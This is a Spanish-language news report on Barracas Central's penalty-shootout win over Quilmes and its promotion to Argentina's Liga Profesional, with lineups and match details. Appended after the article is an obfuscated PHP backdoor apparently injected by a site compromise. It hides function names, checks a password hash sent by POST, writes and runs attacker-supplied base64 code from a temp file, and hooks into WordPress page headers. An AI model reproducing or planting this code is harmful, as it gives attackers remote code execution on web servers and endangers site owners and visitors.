Barracas Central, por penales, pegó el salto a la Liga Profesional

Foto: Barracas Central

Barracas Central logró el ascenso a la Liga Profesional de Fútbol al superar en la final a Quilmes 5-4 en la tanda de penales, tras finalizar igualados 0-0 los noventa minutos.

En esa serie decisiva, hubo remates perfectos. Anselmo empezó anotando para Quilmes, continuaron con resoluciones perfectas Tapia, Ortega, Colitto, García Basso, Estigarribia, Moreno y Paz. Hasta que en el quinto, y último, tiro de Quilmes, Rafael Barrios remató desviado. Y le quedó la gran oportunidad a Barracas: el zurdazo de Valenzuela significó el pasaje a la categoría máxima del fútbol argentino.

Despojados de los primeros instantes de nerviosismo, empezaron a soltarse, a alternar el dominio y a elaborar situaciones netas de gol. Un gol bien anulado por posición adelantada fue el punto de partida de las emociones: centro de Pons, en off side, y buena definición de Machado, a los 23 minutos.

Dos minutos dos puntos, un centro de Vázquez fue conectado de cabeza en el centro del área por Glaby; Saracho elevó su mano y mandó la pelota al travesaño.

Dos buenas chances tuvo Quilmes: Rafael Barrios llegó a empujarla, tras una tapada de Gagliardo, al lado del palo derecho, a los 32. Y a los 36, Pavone metió un cabezazo que pegó en el poste.

El segundo tiempo estuvo signado por las imprecisiones y la falta de audacia. Se corrió mucho y se creo poco. Algunas gambetas del ingresado Fernando Valenzuela, que arrancó en el banco por una cuestión física, no alcanzaron para quebrar la monotonía.

Así se desembocó en los penales. Y Barracas Central se quedó con la gloria, los festejos y el ascenso por primera vez en su historia en el profesionalismo.

Síntesis del partido:

Barracas Central: Maximiliano Gagliardo; Axel Bordón, Bruno Cabrera, Fernando González, Gonzalo Paz; Dylan Glaby, Carlos Arece, Iván Tapia, Juan Manuel Vázquez; Lucas Colitto y Mauro Albertengo. DT: Rodolfo De Paoli.

Quilmes: Rodrigo Saracho; Rafael Barrios, Pier Barrios, Agustín García Basso, Agustín Bindella; Julián Bonetto, Adrián Calello, Facundo Silva, Camilo Machado; Facundo Pons y Mariano Pavone. DT: Facundo Sava.

Cambios en el segundo tiempo: 20m Fernando Valenzuela por Albertengo (B), 21m Tomás Bottari y Federico Anselmo por Pons y Silva (Q), 23m Leonel Buter por Vázquez (B), 32m Tomás Blanco y Martín Ortega por Pavone y Bonetto (Q), 43m Emanuel Moreno por Calello (Q), 46m Germán Estigarribia por Cabrera (B).

Árbitro: Darío Herrera.

Estadio: Presidente Perón (Racing Club).

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}